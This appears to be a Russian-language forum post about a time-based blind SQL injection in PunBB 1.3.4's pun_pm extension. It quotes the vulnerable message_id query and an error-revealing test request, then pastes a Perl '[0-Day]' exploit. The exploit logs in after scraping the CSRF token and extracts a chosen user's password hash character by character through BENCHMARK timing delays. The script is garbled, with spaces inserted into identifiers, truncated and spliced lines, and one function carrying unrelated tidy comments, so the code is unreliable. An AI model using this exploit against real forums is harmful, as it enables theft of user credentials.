Сообщение от Welemir
На 1.3.4 LFi/RFI/inj ни у кого не завалялось, или уже не пентестят?
есть блайнд (time-based): message_id конкатенируется в запрос без кавычек, поэтому $forum_db->escape() не спасает — до подстановки значение нужно приводить к int.
================================================== ===============
PunBB 526
# function pun_pm_edit_message()
# {
# global $forum_db, $forum_user, $lang_pun_pm;
#
# $errors = array();
#
# // Verify input data
# $query = array(
# 'SELECT' => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body',
# 'FROM' => 'pun_pm_messages m',
# 'JOINS' => array(
# array(
# 'LEFT JOIN' => 'users AS u',
# 'ON' => '(u.id = m.receiver_id)'
# ),
# ),
# 'WHERE' => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0'
# );
#
# ($hook = get_hook('pun_pm_fn_edit_message_pre_validate_query')) ? eval($hook) : null;
#
# $result = $forum_db->query_build($query) or error(__FILE__, __LINE__);
# ----
# GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1'
# Error - PunBB
# An error was encountered
# The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php
# Database reported: Errore di sintassi nella query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Errno: 1064).
usestrict;
usewarnings;
useLWP::UserAgent;
useHTTP::Cookies;
useHTTP::Request::Common;
useTime::HiRes;
useIO::Socket;
my($UserName,$PassWord,$ID) = @ARGV;
if (@ARGVnew(GET=>$Host);
my $Cookies= newHTTP::Cookies;
my $HTTP= newLWP::UserAgent(
agent=>'Mozilla/5.0',
max_redirect=>0,
cookie_jar=>$Cookies,
) or die $!;
my $Referrer="http://www.warwolfz.org/";
my $DefaultTime=request($Referrer);
sub request{
$Referrer=$_[0];
$Method->referrer($Referrer);
$Start=Time::HiRes::time();
$Response=$HTTP->request($Method);
$Response->is_success() or die"$Host: ",$Response->message,"\n";
$End=Time::HiRes::time();
$Time=$End-$Start;
return$Time;
}
sub Blind_SQL_Jnjection{
my($dec,$hex) = @_;
return"./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--";
}
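sub Clear {
    # Clear the terminal before the script prints its own output.
    # Windows (`$^O eq 'MSWin32'`) provides `cls`; every other platform is
    # assumed to provide `clear`.
    my $command = $^O eq 'MSWin32' ? 'cls' : 'clear';

    # The original line read `returnsystem($launch)` (missing space), which
    # under `use strict` is a call to an undefined sub rather than a return.
    # Single-argument system() with no shell metacharacters runs the command
    # directly; its raw exit status (0 on success) is handed back to the
    # caller unchanged.
    return system($command);
}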
sub Login() {
if ($ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
$Cookies->proxy(['http','ftp'],'http://'.$ARGV[4]) or die $!;
}
my $Get=$HTTP->get($Host.'login.php');
my $csrf_token="";
if ($Get->content=~ /type="hidden"name="csrf_token"value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input
$csrf_token= $1;
}
my$Login=$HTTP->post($Host.'login.php',
[
form_sent => '1',
redirect_u rl =>$Host.'login.php',
csrf_token =>$csrf_token,
req_userna me =>$UserName,
req_passwo rd =>$PassWord,
save_pass => '1',
login => 'Login',
]) || die $!;
if ($Login->content=~ /Verrai trasferito automaticamente ad una nuov a pagina in 1 secondo/i) { #English Language: You should automatic ally be forwarded to a new page in 1 seco nd.
return 1;
} else {
return 0;
}
}
sub usage {
Clear();
{
print "\n[0-Day]PunBB F
$Time_Start= time();
my$Get1=$HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
$Time_End= time();
$Time= request($Referrer);
refresh($Message,$Host,$DefaultTime,$J,$Hash,$Time,$I);
if ($Time_End-$Time_Start> 6) {
$Time= request($Referrer);
refresh($Message,$Host,$DefaultTime,$J,$Hash,$Time,$I);
if ($Time_End-$Time_Start> 6) {
syswrite(S TDOUT,chr($chars[$J]));
$Hash.= chr($chars[$J]);
$Time= request($Referrer);
refresh($Message,$Host,$DefaultTime,$J,$Hash,$Time,$I);
last;
}
}
}
if ($I== 1 && length$Hash[COLOR="#DD0000"]